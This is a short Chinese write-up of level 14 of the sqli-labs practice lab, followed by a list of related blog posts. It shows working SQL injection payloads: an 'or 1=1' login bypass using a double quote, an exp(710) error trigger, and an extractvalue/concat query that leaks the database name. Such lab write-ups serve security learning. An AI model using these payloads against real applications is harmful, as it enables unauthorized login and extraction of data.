sqllab第十四关通关笔记

知识点:

  • 错误注入
  • 这里的语法是 where username=""
  • 直接进行双引号绕过

通过admin admin登录发现还是没有任何回显

通过bp进行抓包;测试输入内容

构造payload:username=a'+or+1=1#

发现不能成功登录

尝试换成双引号

构造payload:username=a"+or+1=1#

成功登录了

尝试进行错误注入

构造payload:username=a"+or+exp(710)#

错误成功打印到页面上了

尝试利用错误注入获取数据库名

构造payload:username=a"+or+extractvalue(1,concat(0x7e,database(),0x7e))#

成功获取了数据库名

到这里就结束了,利用错误注入获取数据库中其他敏感信息在最开始的几关实验过了

10

相关推荐
Suckerbin9 分钟前
LAMPSecurity: CTF5靶场渗透
笔记·安全·web安全·网络安全
小憩-1 小时前
【机器学习】吴恩达机器学习笔记
人工智能·笔记·机器学习
UQI-LIUWJ1 小时前
unsloth笔记:运行&微调 gemma
人工智能·笔记·深度学习
googleccsdn1 小时前
ESNP LAB 笔记:配置MPLS(Part4)
网络·笔记·网络协议
楚肽生物小敏1 小时前
Cy5-Tyramide, Cyanine 5 Tyramide;1431148-26-3
笔记
speop2 小时前
llm的一点学习笔记
笔记·学习
运维小雅2 小时前
哪些因素会直观地影响到产品销量?
经验分享·笔记·媒体
抓饼先生2 小时前
Linux control group笔记
linux·笔记·bash
搞一搞汽车电子3 小时前
S32K3平台eMIOS 应用说明
开发语言·驱动开发·笔记·单片机·嵌入式硬件·汽车
大筒木老辈子4 小时前
Linux笔记---封装套接字
笔记